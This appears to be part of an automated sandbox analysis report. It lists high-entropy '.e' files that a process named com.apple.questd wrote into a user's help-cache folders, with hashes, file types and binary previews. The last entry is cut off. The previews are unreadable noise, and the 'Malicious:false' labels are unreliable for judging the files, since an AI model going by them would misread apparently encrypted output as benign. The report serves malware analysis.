                                                                                                    SHA-256:D033FA519081BE91E0AE9CD589AA7440F78E3B8A21B61D8D7B999B6129C1D314
                                                                                                    SHA-512:5771A0D6070D45827DCE5D29C6902C1D6D7C68D4A95EE26F55D8D9B1025F551C44917F4C5B3B1831DEC4241E1725F92352E8F497E929417AC58526355DF1DCAA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..j...z.R.....o.=.........d~...7....Ec\..}jL...HX....u...Y.k...aY./..F.QJ{.1...u.7.%...7Y..A.T...\..o.#w.....L'X....)..Y.*.. .5.^......2eI.7..5$..H]..T.........|$.cid'J...(.x.lv..@.....Q......kr[..,.z...H...5...\....]a...\J"...(a.5~Da.S..2.]eeq.....u+..W....k9..3?...;i...(C..3.....h.....'.%...'Ftc...URv-.@-..%ay......IE....Kg..5.f9Zlb...p,.i...u..;....-%.R,w..7.........!.......+...`y....1.....%*..<...6..&Hi...........>....E......|.G.3.....1..D.V..v....v...Zv..1..r6S......6D.u.,dw.....L....ns..X'RD..Aj..0v..Kc#yc5-1...o.p..H(.Pkw.......J.9.$......R...G....:.3...O..>.y.ch .)8>.....t...n..u.........MA...r.....9d.6...V6.~........x_......<.X..b..h/.V..._....Z.........U.$.t.....<..f]p.#X..0rc.....q...8.k..|.D4;P...i........Q.w|.....e.E.D6......I...i_...=DF.~l..^...*..g....j..s.....\...me#....C.8...L{..r/.....S.N..z.EH...ot....B2..:.s.x.....b..<d..6.(b!....\vc.4 ...I....K......>j...&*A..6..^.%^.......Ud...4.`U...u./....Z..o..Gx...e[...........#.?.....6...6..O.]s{..'_L.=dL!.L..L.\..W.!.u
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.ActivityMonitor.help*10.14/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):12218
                                                                                                    Entropy (8bit):7.967209254147259
                                                                                                    Encrypted:false
                                                                                                    MD5:54ED378BEC17362347303984B73555E6
                                                                                                    SHA1:B71395C34FA7AD6B649C124C7411253096FA1553
                                                                                                    SHA-256:F9478D22BA42F7AFE2B09E546FBF110A45B5181DCC35D7BB85E276808711293B
                                                                                                    SHA-512:AC21BB256B79D15864F2B1B6D365AEDF0373091CAFC04C8B4DEE1B8EBE5572112467891AB01E42CB6FFD53A97BD202317145FB22FBBFD08AC3543652489FAF0C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...f....M6..........H.....D.3.f........"...ESI........n,>C+j=..Wz^.Y......I.nO..C..~.)^Soqw....>.V#......b4...n.Y........?`G.<...b....ta..><...>v.J..}..B.{.I.ok....t......&JK.=X..'.a.....l...8L.'...fq.*..Q....."...b..........~....|f.....B....hh.o.3|w...P.l..........~l\(+...j>..1...Y...<$.[...^y.....Wr..]/K.BR<A.......`t../.O@s....)...q...L..2'..kr............d.!i7T.4LT8.Dv....\...&.^.q...y.z..o..M.Pse+....uOg'.H...<p.X?....T.y..Z.I...u....{.^.X|A-.)y.......kk.....sY.Q..q.\..*D1O..6.C.X..c.D.O.s.....7...;..B.5...Q..z.8.g..l;L.N((.....)./mW.L3.(~+....a..t/.e..S.=l.3.G......`...v..R5#...=.uw...........5...T.I.Q..a.....$,27.S..J.....@e./*k=..]..l.0..n.....~.....'..-........#.I.h.4...B.....L.....mf0..U...k...!.N......N.Q...)......q.m;...w...&.W.s....+..X.8(3...Z......L......s.g?vF...@{........LX..S.UJ...7\.S........ru..+...H:2s#BI.]t..".)...~..k.L.+T..5.`/_V....dx.(..+%...)._....qC........<..H..M....$....k`.+l.... .....n7}....?...j/[re.D.fUX...+.`.....%..P.q.U.........<.#%.6TB.b...K. .N....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.AddressBook.help*12.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):34284
                                                                                                    Entropy (8bit):7.99119420368609
                                                                                                    Encrypted:true
                                                                                                    MD5:2BFA69A22A924A0CD65601C1AD42BA13
                                                                                                    SHA1:6C8DE4C33F0F495FF488FC524D58ED2AAB758BB3
                                                                                                    SHA-256:1BBDA5C5B8DCBC68D1F61693C58D5A7594DDB80AA02E3589034E5564A66F1085
                                                                                                    SHA-512:473D00DED23565F8BBBC5A60D0048ABB4EB1139302FF54126018C4FE376F13C5700371D8A55A76E861A019B519002334862A1CBE7FF83286117AF45C294EF72D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......3..d...[Z..@...q8.N9.......o*e..].].>.L..3.i.S=......loXF.P..O...1Ho&.8.z;L.2.9E.0./Z.F..r......,.....n}...t.m^..k.......l.g9 .XLv....3..;...r"?.|.Nd.5............................>v-.v.!N...G.2.\8xC.9./8..,J48y...}.<4L..J.P.H......7F.m...](.".4...ZE&G....&Nt...].......\.......Zt..3....U...+x...6.T..u.......V.."R#L+ZS..j..6...)..`...@w.U.p.vB....3124*...<....9...>..I<.]..l.+...LsV..Q..f: 4.P......&^..ly...+.].y...&.+.,..:._.i....v......P1E>|..o!?.....#..4]..kQd^/......4wY.........?.Ig..vs.-...n..h..n...'..R..2...?.k.rh...W...0=v.}.3.....y.5.|..u.0..q..,..".b..Ka`...:........IP.:x.).4.n....(...X.K.N\..!.....A.#..f.....i E.9.n'.uG.....(s1.mD.x....f..vu.3y...8.X......9..1z..5......G.-b._&<.6......d....U..caB.N.)....KM......C.u.;.?...40..o..1.....|....+..k^..Wsr.}..Y.E.H3[...1.k>*.ty....+-b.s.... }....z.=sP.;......s...Q...L}.........w..o....N40.q80N.Y.>8..~d..^....T.$.`.~.]...r..<j..*.8Gl..F.e..^#..:..&Q@n#..'..>=.J....._57..8,.A..........1.6.b......'.'..Vd...}I..>...:[....s.Vto.q.rX
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.AppStore.help*3.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):10498
                                                                                                    Entropy (8bit):7.9618735521470825
                                                                                                    Encrypted:false
                                                                                                    MD5:B7B5A05AB4459A446FE3F43C3B604192
                                                                                                    SHA1:300C5C83F63533A1B3935E19CE52227A5DCF602A
                                                                                                    SHA-256:57166BCAEE1B18E3C30E54EF9955310A33131B1CD76C30DEA9A96CF25ADB2645
                                                                                                    SHA-512:99C52B7CC715DD1916432EDEA50795C04F3179673E4F2956C3F935283D031537FF6E49DCD94DD1DFDB885ED911412145E56D7D3D04C58EB7CA9ED66910EB8702
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .h.K..x....w...:#...I....Z..^...8G...v.Eqv..R..)...p...Y.....;.0.......M6Lo......lR..u...{......'.....|...'...(..iN.C#......|:.7. ...5.Ey.b..l....$...m.......".-.........E.{[!....jF..C\.<..)...............5.....z.e..J..:.j.M..}......aF.b...hU>R..t..!..~g.<d/J..&TiW.7E..?...[L.vL..q..",.&g.H.g..?.;.....k%.V7.z..B.uo...j..*.y.g......P).s.26;D...h.#E@....P.g...g....G./.V...>...6.hS0..q.Y....1x(_.......V....$....k-}.R....hf.*t...U.d..$@....,,+._.....5EW;.h......W.S........^.OO..=/.K..B...b.).`.^....&va.....]AF....<JW..........B.h..!>9....:Q.....i...J.T.ym.,..}9..X/.....-.$...}`QcZ!.j..@>)......?.d..<.2......W.`..P.2..H..n.gX....%..0......0.......o.........'.b.7....D...ho.k~k.'~...<.p..*..d........w^@..).....T..I.(h.vwP_JU2.bX.....m"Y...!..S.._/.U...K..@....qC..%.rnm....l7R...y..I.n,B..Z.(.../.....=..z..KW?.lP.g.TT...Z...E......n....8.F.....+ fI.,.!.!.^....D.8.......N@......=.....JF5.[xd...m-r|....L.....-.....n.!..B.....gB........SXJ..y..R.T......X{..Lv..pB.4..``...?..MW....2#p.;......".=].
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.AudioMIDISetup.help*3.3/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18443
                                                                                                    Entropy (8bit):7.980506333302962
                                                                                                    Encrypted:false
                                                                                                    MD5:45FB2C5A5B69C2009557584D94B49F9D
                                                                                                    SHA1:874A7E34CD6429DF79F5AB163718F04E76092529
                                                                                                    SHA-256:CEF28FAF929D4E05B6E63C793F9C1933C4E691925268528E7886B7EC55190DCB
                                                                                                    SHA-512:BDE660E9EFA5CCBD14FF9BC997AF3D2BA4DCE96D639211F653C1C9D7CD49D647C1E7452BA08E39B5AD5F42F2BE5E2D89D6852C5B9BFA952B95382D49A13DCC74
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .F.8..q..2.%...t<.)...-D...]W.i...H..i.s...%T....l....gU.om..$9.[..`.. m.=O.<.E.2F...@/MN.El)..e.s.a....~.n(..N.+...Ld..,.|;.SSE>5...3...^.vw.......d....r......oB..D.{.f;6...f(X...I.z...Z....XzL..Us..jDR/.3.V#....a.>.1.*..B.........H..x.h.(...u..'V.=:...eT*....P....g.Q8.M..>.!.#I|?..BB..r.B..Q.<X.......d<...{.x8r...!.^@8.0...$E."P......v..Z..O....A..?..#.sAe*A.....B..-..Z......M8.mG~...).L5|..p ...-p..[P.,.....+....R..G.Dq........UZ........$1..3..mx..r]..3.5..;.....{-..J$l..i].H ....:.Gb.ht.4o.....U`.W'.f.].w......s4kz#...;..tR..C...k.`q..3>..."..0Z-jC..P..Q...o..x+f..(T.!..........z%..R...+1D..]q....<....m......J....)....).nV..A..!..g.."z.x....g1./.S.o....q"....Co.g....)J..bey....X....]...f....e@.(....._..A.~.Q!....Yhd.j..@............w..g\}.NDY..z...uuy".G|........BL.....L.]<..iU..3.....Vz.%.;...........>..Ry...<.....,..E:....~.g....Z._.k.>.............tfG..a."v2T.R..by.....f..^RX........UX5.x.-2.cZV...=.>..........s..g......tf.c.....m..eD..lq...r..y.i..4f.O...'....52........Bt.....#
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Automator.help*2.9/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:DOS executable (COM)
                                                                                                    Size (bytes):21563
                                                                                                    Entropy (8bit):7.984080484383359
                                                                                                    Encrypted:false
                                                                                                    MD5:94621EADBADF5B02D225A8C1EE91904B
                                                                                                    SHA1:7FC11311118CDC190F3C67833E516E35BC394F7F
                                                                                                    SHA-256:50E0485BBA6CA15B65C5F5DB67C0395884AB3A13DDB8E3EE9B77179A3A43AE96
                                                                                                    SHA-512:5C3511AED7F9B4462400286CE22FB69CBE954196CB7A267D56285625C4D89CC0FC9BF03FF4623031B7CA96CAD836B199767FB0991161E78116C888F43F2175FF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......\.m./....Pp..!$$C.v..d.fY...Y...........!A........-i~...^T0cz.af......xF.a..Yvle...j.7.|....U........[...fBW..~b'.|..i..y*..!Z.N....5...a.Y...@8...z..*....yh)/..+.u.(.u....}...r.....f..FR....j...$.|....8..VCou.y......l*>to./..8P......b....l=....e!.."....,.g/.z.2.....v...*.Z...v........y..........zerG.x..'.Hn.%.;Ht;......].s.N...9f>....O"........H.(}.....H.u....E..........?.R2..a.iB...<.z..Q.@.s5.,...l6:;....}.3,A...uq.lF.....h.;.$.T.~....#zu..lJ1W...u...|.<...5...t$...R...(D..xe5.r........+.v.Q-...7.....t....R.}O.....`t...Bd..b...l)..s......~.6....J.....)...-.}...].+m<..9..+.0B.....h".B.........2...%......6L..r)X.. .q&.0.x.M0>....s................E../.."..W...n.i..N.U...qX*..-s.Q..,...~.....td....~.2...$..';}SQV..h..O@..xA.._.5.4.=...aN..+V..c.Zo[...y..s5.i............%.Z.........W......9....;..%...6.6QW.d.DJa....<g...&}..00.K...Q.8...{...~...q....h._.8mdZH...Mlh'(-.`Yd....]..?.@D-......... f...B.{.N.....P+\s..|..BUB..0d_.X.m.f>.....E../'W...;.}K.r....x...\...r.................A
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Calculator.help*10.14/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):3618
                                                                                                    Entropy (8bit):7.841188032203163
                                                                                                    Encrypted:false
                                                                                                    MD5:2B7B0BC0745DE786F4427AF650A8F5E8
                                                                                                    SHA1:AACEC52C2C9490053BD6E6D2B7BA19DB42442415
                                                                                                    SHA-256:F1389E903F1C8DC5F97E92A65DAA9D961FE153E0094CA62808057BE7F1BC3B34
                                                                                                    SHA-512:86E1B74557634C19A6B2617F4FA3E07E6165EE3B94ED6D8A66817204F519FF0E5050182A1841FEDFFFCBE93376D51771C2263DD80ABE8CA8A1FE87815067305C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .RJ;...#JO.......m.r.p,..+..2.u.4.2W......|4RI{..*[.......?a..=.F..T.w.M..._ig...q`v.s.!...>.._.a..~.P.+kc.p..J.=.5...Z.?Xg.....S.....9......(.:-1..{..!*...#..4.....:6......7...Hd.~....&W.A......^....h.I....bF.0.o.m......U.w.yD...{l.FN..H.....7g.c.a.....mPj..2...8.8...5.6..b8~"8%vy..k.../..pR.A_T.i.!.^f...qs...'...!..e`B..!79..9I^.z.l..T8.............{......P..8..M... g8.n..~..x..!2.N....C.q......'..'.OXB.W.....@.C*c.A+*W&.N...`.6..v.wU..v....w.....)..z..e...x.M.I.A.<-%.a/.77.A...H.e.n(....<E.V......UE...o..-..|...........J.oNa.d........;Y[...<...IN.S......T.y..b@...U.v../s.<..t..`.C..B...t+..PF... ..s.....D...y.9..D.<D......_..........~6.uZ.$..:..ztO.f..3.G..<.XMh.O(L'K.%....M\.'...e.R.....:. .. )t.....WR........[7UH...y...\...P...Z..._.........fP)$...e........nU.D. ..1...(z7.o.E..E.|..:.F...yh{....wz....6^.'"..q..3..7...M}nV..be-.w\0..2aI..._..Xp........a.r.9..v6...........$..y.....q..%xq.@........`:.3..e.al.[3`.A.F....>...._;dQ....a.AS{.Bh8%.k..i....<....8..zN..,.......g.h`t..Qr....
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Chess.help*3.16/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2666
                                                                                                    Entropy (8bit):7.760713818482113
                                                                                                    Encrypted:false
                                                                                                    MD5:D7CD2BE2F7402B8CBD8B4BEDA9D6FF7E
                                                                                                    SHA1:2B6A28606ADEFED4AA3DB449B8CA419A12A231A5
                                                                                                    SHA-256:70825ACD0C014E67B773AB53AEDDB781D33DEB0B50D23716BB046F74ECF07EB8
                                                                                                    SHA-512:E60837241B9A745E94968994ECA798AD7CAED7AC39C62A77CC253A29FBE31D7ACAD93C452CB9AE7B1D6461FAE53577F9CE2B9A4C587C7594FF110A7678F6177C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: Ifg..&.........h@.^v.@.;.M*.u..|..Bh..-.g)..d..F..%..!..*..T......n...Yu..h...B&.b..r.C.Lv5.e.PE...Y..C.......T..4.<..r......{.....B...J......Mw.....X}....`.A...%.....=..V...........Z._.m..n0....{.........EM.W../Ze..{.b...sHi}!....u..p...I..YI.j.J.f...'.|]..O#AM.T#5/m.~N<..!.f....N.?Q....%..._.x..>8.;.....E.a.8k.z}..[3.D....1..........(...G....lr......^I.... 2i..y).....X{J..Fi....Q.8q..@......V.J`.,.}.$m.j99..!.[....:4.J`.BWn.A$B-..k..^9X0!....U...1.....>j..........O@...z..........K....~....V.g.?..b....1"G.dU........+c2..dq....`..:...?..H..#E.3..........Uo....(K..&..=..6g4...*...........S..S...6..n.{.p..Q.V.:.......6......5..3K.p.S.'.[.....l.j..0..^.$............K..../......E..E.]h...U3.1.$M.ZF.M.}.h.....%P.n.0>hj".Y9%9S."..,K......T.D......+B.L.._.&g..U..+..2.r..-.....h.....`.....K7;\zo.R.|O..T^..9.jtZ..=..*..IXy..Nq....R...%....'....w.(.9...e...y.l.....K..Gq.@.e.5.&......2...I...7=3.K.....e'..Hx..P+'[h..J./O..L...........N.02i.Z.4........0......Z...q.i.....W]..........Q.qZ.]...x.6...
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Console.help*1.1/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):11362
                                                                                                    Entropy (8bit):7.964151982930249
                                                                                                    Encrypted:false
                                                                                                    MD5:6E2D66D00DC7B84BDF646D87F11A74D1
                                                                                                    SHA1:58A4833233B23D041ECFFD48A44C372D26B5DEB9
                                                                                                    SHA-256:D742986CC1274976017AC3D1CAB70B4AB49AF2AB96F3EC4E42D1BDA45E6B80EB
                                                                                                    SHA-512:C5FAF2E4DC2D27798B7CE164AED98FA62CB4347ED1882D5CFEBCE029E666D97D164A72921929BD643396682BD49245A8E491E6E76C5EC7BFAE6FA84D98E0F63B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..m;p...MB....)K.....3.R.G...m.84.O..c.,.7..=3...<.eF..a....tV....1+&S...I.]R&.v...Y..J<..7t..r.T.:.+eV.v..........QI...ye...}|...t........I.}....-~.EAyW.c....9. y).L..,.~.p..2.3....D....y.&)1*..j.._By.5.s.<H.};.t7..w...q..J....S.",.A%........CO7(G....*o....*..B+......../I|.E..I.1?....V.....|.{..I.G.....EU.X.|..;......e.....7z....-.......l...%.=._x.\..&.....~.......>.......YOa......%...._.........go...SQ...T. ..w$...F.......7..K%.xk.+.lt...Ie:J-H.E..E.&c`..^.....@...../T...+..<.y?...l..x.p.D...^=.=..qnO9.-w}.....8.}.a........j.'T..)...184..1.G.3K3.}...7..p..P.x....W.m%..."....M}.....e+..".'#..7h......U....9.....B.FG.$p$.Yl........u\........+.h.<..-..Bn.f.z(%B....OtH*...qL....n.L.....{w.A<<q%. .m..=.@s......z]~.S..c..`.;Z.7].Rn.e!Jn.7.'...t. ..Y..1-9.?3.7.5.._A..t@...{cp...(.@.....d....eo...<.)|r..E..]..^h.v....iXJ|....?.%}=...g.M)IH...|.f...k.s9...h...{^fC.p.N.}...q..T.X..c'/F.....T.&S.}V.....3.eT.....!Bu.(.....s.E...C...G.k...C2.-.x....."..q..9...z&.....z.e......BZ2.V~.q....lo.:......
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Dictionary.help*2.3.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):2762
                                                                                                    Entropy (8bit):7.761458210297462
                                                                                                    Encrypted:false
                                                                                                    MD5:CFE41E1DFBD42AC5B4087D810128856B
                                                                                                    SHA1:C45334D2354B2EAD4661AD32EB4BA707CE7679E9
                                                                                                    SHA-256:636F1BE3DDFD6CCE4FF1413425C71EA97903DD0282B69424EDBC118CB7709F4F
                                                                                                    SHA-512:9D5A1E7CD8D4824B5CFC140B8648D04D045D775FF8CAC988C868DFD4E39F6D8B6F45D787F69814B885E2FAF95C922D6D0177FDB7959777D795058FF42CD1FC98
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o.....[..`...........'.vX.<../~....}\..........!#....LG/%(8.y.=(.\.u....4...*"hi(....K`......GO..A....*..`..5?.......N.../.~....q.j-@J....C.........../..G....9"a..To._..9....^I.]..O.I.&...;M;N....2b..]......$?....6pe;..'M.{Y.|.{.%ip|4<. .5..[9/.a.^.[&.mc.N...c.........0c.dD|........3..lO\.v.-.5i4OsQ&.....c.G:|Q....6...L....G................V.....S..j.i..tK.X.m...|....eV)......h.C>t"|/.b"...-i..g....^.D....V/`... ......J....G....>..).b....G..x......W$.m......z.u6.m..&..a.o^UJ.w.:m#....0..Hq.[....t.9.....|.E...w8...e......U.f..VA.......i...y.|......d..B.Cd"..@...9.............X..........U{(....C..}.A~Y.ZZ....[..&.....,..;..:......f...4..=.C(..:.6.Q;...^?...zq..I.9.].e[7...`.V..b.K......k......Eg9.>..j.j....K....L".r...@.u(..i..qR...-..:I.P......P.R~Y...........=.}..^.Ve..I`..g..."..M5.....g.L....m,..6.G...C.R|Dm!{q....<...9 .c.....0.,i.Y.Q."U~;@....|4.x..m=..^..W)V...]......p... C.y;......J.p....0~.&>jR..7.x.8.=]../.|&3..H{J.....o#.Y..a.@=~.4.u.....,....$......hk){^......~..6...8r...'..z
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.DiskUtility.help*18.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:Dyalog APL version 22 .152
                                                                                                    Size (bytes):27931
                                                                                                    Entropy (8bit):7.988442052289471
                                                                                                    Encrypted:false
                                                                                                    MD5:F08A38AB6657EF6558236A645D0CE836
                                                                                                    SHA1:993DF4D0C2FD1335AA3334EA478B3763D56FAFDD
                                                                                                    SHA-256:90BA9243D755BFBD68EE69BB77638D21CEF686CB7A886039EB855BCD5056809B
                                                                                                    SHA-512:E1AE444203BDD68907D6EC4CE2783A9D590695CC7B1C1C2603F1295E9566F3747EA20E90DBED620830B6E3DB093538D04C3182A2E12068803CBF9238E89E1E3C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .......5P.........}.*h.t.:.3.g.."-.....U....'~..%.L..HqU.zk......`-.PQ.....|....6d.-..........yXmHv..5......X5.9?.....$...%b.W.6X.Y.".;.....X+...ZH..F.....&.O....0/2K..`...l....J).N.....R..@i..../..?..7...;. .\.<.E+..R.GN..]2...,)5..9ca..s..pJ.EcV....U.M[..Y...k.......pG...9..>.Vr........~D..>."...d...HCO.Z.D.0X|...p!w.[..P.......g@..ut..<.".....ZPh....f...<^..V5..y-..eRW.......kt._..........1..Bn..2..+...o..t.6...0.d...]j..O..`El.x....A....u.y..&.F.......'.g....._.j<.3?...gqdJ.Z.z...).........M$....]0..GM.....;..L...0.y.......x..{..d4...s...{1.I[..NV9...Sy......%..g.#....y..cJxU...8....."...+..s.p}!,.........q...Z..z.....P........K"...5EN!.<..........J.,...DB.CA...f[aUV....Y.....`fV.VL...ei\...J.:w....g.Ub}.a`.l.....b...":.....!A......B.p.4G#...$f..Q..`.ms..Z..D4@.....S.m[....5_$...n........|...R..<Us...Z...+u/...&....y.W.D..A.,..;5.....T..GZ2..4....-,...F......K..[*...C>.f...>.....RY...C...}...'....~.|.. Siz...q.......C....|D.._/4.z.!......].........+.vL...J<.......}.@....p..(./. p.d
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.FaceTime.help*5.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):22683
                                                                                                    Entropy (8bit):7.985241091078606
                                                                                                    Encrypted:false
                                                                                                    MD5:C58183CAA120C0FEA1DDAF22E27C0898
                                                                                                    SHA1:AADF0E18D57BDEEC018A555FD087F42B160374A9
                                                                                                    SHA-256:D7B2446C65B11281718E8E13C48B8CB556D09CBAEFAE85E33AEA8737D300B25C
                                                                                                    SHA-512:8124A27259B7BEAED7A835BA43C7017E9F1C803F7EF1E6A419FEDD7B069A5185E369BD1BED4F51BAE1D79B9E43DE58DD6E4DA3D478F945C3FB93816145FD6D0B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..u..9..=.B.6.aU>.....p..<.,[..."-.....Un.X.`.&..,..9..)4.'.T.+.O........muOH.E...F.F..?..fg.JP..f.E..g..>.C....H.....)~.C.....Z)..UR......... ..@eKNY.i.....\#..Wda..+.!.=.+.{....9..'...Iu._'.....Ych..e..k8..}G.tm..HT...6..LgA.U .....R.+.,.t.=..o..zM.....6....Q.........1../....;} .d{.7.yg...J..1$.(EBbd1.u/u........!F...................V..rL....Vp.J.E.B..T.......B..L..\..0.GYz..&."8..i.. F#+......O.1.K..B....f..#.9..B.......:....i.?1.....2....vv......Y.B....y.W.#......Hh .....KT./.A(ZD....R..../R..!..4..67.H...];?...$..q..p...\....=hsn-...oj.|L..F.M..!.m..vk..Dj.@...............t.]p5.{.............QA.........kl.?.a.~X..8..-.......~...7...S...i.EIQF..(.~i...%..1....."|.3..o....9.\[s......wu.7.....>...qL.1....<.......Qz.Vi.nf.R..rKi........E..#...L}b......K...^..?..E/....l#$.l..N-.V.,......<ER..,....h.....nxN.*!.L..../.n....{.$..Cw..7'.....;-......~..!p..6.^.Q.zH.K..@..!....c..A.c.-....3('.&...c...eq.....`5.g.}........g..G+..>..L.....=....AJ.1)@.'7{..+.u.c]....Y#....|.i..@.-.J.z........B.
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.FontBook.help*9.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9482
                                                                                                    Entropy (8bit):7.955376600126772
                                                                                                    Encrypted:false
                                                                                                    MD5:DE5519B43566779557C86D9876FAD726
                                                                                                    SHA1:737E29F2DA9BE3B1CA5E32FB9B0806B4CADA3214
                                                                                                    SHA-256:6BA492104956B7930C4CE35291770EABCE71BAFEC08CA5FF86EF6F29CA56DDDB
                                                                                                    SHA-512:657471E36181A80C0D2685FD0F40E5A09CBBC1E23B0AC834DAB2395144355C5D90CCA13F3CFECABD9B71217A63CB8CE3C60C1908D7DD7F1D32962394D4623E3F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .8.o....b..xh.izY......S>.7<..eT.K...).q*..........C7.F|y.].........u(:.....Z)nS.2.8m..5_...Y..-!Q..q9%(:.,..F.m.....i..l.@:MP^......i.j..Z..2.X'....7.O..pP..}....As.V....~....hzD....Ctj...q..]...}.4. .#...$...'.4eU.m.u.]:....!....+@...:.>%k...]&...'md...A.....#..Z.....q.........}..2-B..u..kA.rJl.Z..!.I.MK......z..........h......S\.B..YG.....Qh....,....6..3&T..Q...i2..o..@a].....H..~......[F.kf........3.*.5.n...K.DcV..Zk\......#._-^d.....A.t..q....9.........[{.$..!,...Y..S....(W<.w5.s...je.q\.......I...M,5I.....w...`rx./....tj......0..sg&.....WX.g..X......,...{.$.`$Wb]Y...}...H..bVTp..j.?.Z.O.1..u..e...fD.&5.*.9.4._t.L]..i....I........0......O>..!U..d.`T....Y....\.r....0..L.(@bX?..V.w.............V...D...s+...F..<)$....4...........v...f~t..K..I...!.-D..sk.F(j..y.t:jH....$..%.O..<.0..4.4@....{..5.n...o...=K....Wj..8...E.PY..d-.[....]~....@......z:|.,[y.3.g......!.NMa.........6.YC...gY.&..:......Tj..p_....G.....N.~.H.'1J... 7e..........Xuc...t..?..!m..........1.T....f.\.W`.%.....?.......
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Grapher.help*2.7/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:Dyalog APL version 208 .173
                                                                                                    Size (bytes):9794
                                                                                                    Entropy (8bit):7.956894623786696
                                                                                                    Encrypted:false
                                                                                                    MD5:A92EB8322764B67224908417AD56E179
                                                                                                    SHA1:306A05B7A03C917DDBE2586F2EB4E8A363B2CC90
                                                                                                    SHA-256:C9D9A9265BF48E4400AFF815AD99B4A1D508F5C28B81437DCFEA414A3FF35272
                                                                                                    SHA-512:51229CFB4D2B6D6565D5B569EB6DB04135D3CD3FD05BE418B867F9C3C72AAC1153C245207AA4CF6E866AEF3B0C73F7469BE1DA6739C032BFB2D7E073AC50DBD8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....5...(..\....?.,.,...e....w7......0.;......I&....a...E..bs.......d.P...~..~>..Q.f........WL...wk..v...C.B..Z\C7...Q].....o....z....jtf..w.%k.D-9.'.<c......3...{.....n..G...=.|&W..vnt......A.......8.c...q..&.....}....Wu...!..~../..x..f.s..v........M............<H`kf....n......K..L.......ETH..s_:.....4hG.....yh._.:...`(....d~...'...D.VO.xU..z..sX........,....b..Lx..eJ9...F...^.........VW....US ...%}..YJQ.-.-.bA.V...^.c\.3..&7....p...+..8n.B.]..t......2.#(b...V....y.2..'9..o>...q..\.. W......dpH..l...tV.:......^2?.[.X.b&......li.C&....e..........^.:......FgNy.c..n.~...H....H.8#R.....7....S+*f....C.h\..t.z...q.2,,zG\1.q....a...."..@..N.|.fP........{......H.[.......D..\...........=.....z.kJ... H$..;..j.....&..a...P...P/..Y^h.:....B..`BG7..@......)uz...6...=yl+..'..>rZ./#.....4.~B......1........i../.OT..V..a........~.%..1Z.H.....(..^...XU.Tz....Ksf..'p.xMM%.Y.Y..0.D+.L.<`.q.....Vy7.....\..<`.....:..k.pj.).>...y?.}ua.......E.9.$...9..Mz\.../!y..........E6..g.j..O.e...=........*...E~...t..h
                                                                                                    /Users/ben/Library/Caches/com.apple.helpd/Generated/com.apple.Home.help*3.0/.en_GB.cshelpindex.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):7866
                                                                                                    Entropy (8bit):7.940115834833402
                                                                                                    Encrypted:false
                                                                                                    MD5:BCD56BB8936CC471EF6DB6CB674BFFC4
                                                                                                    SHA1:5DC42B20CD246B2DFC3D67C7510E320EFC13C3BB
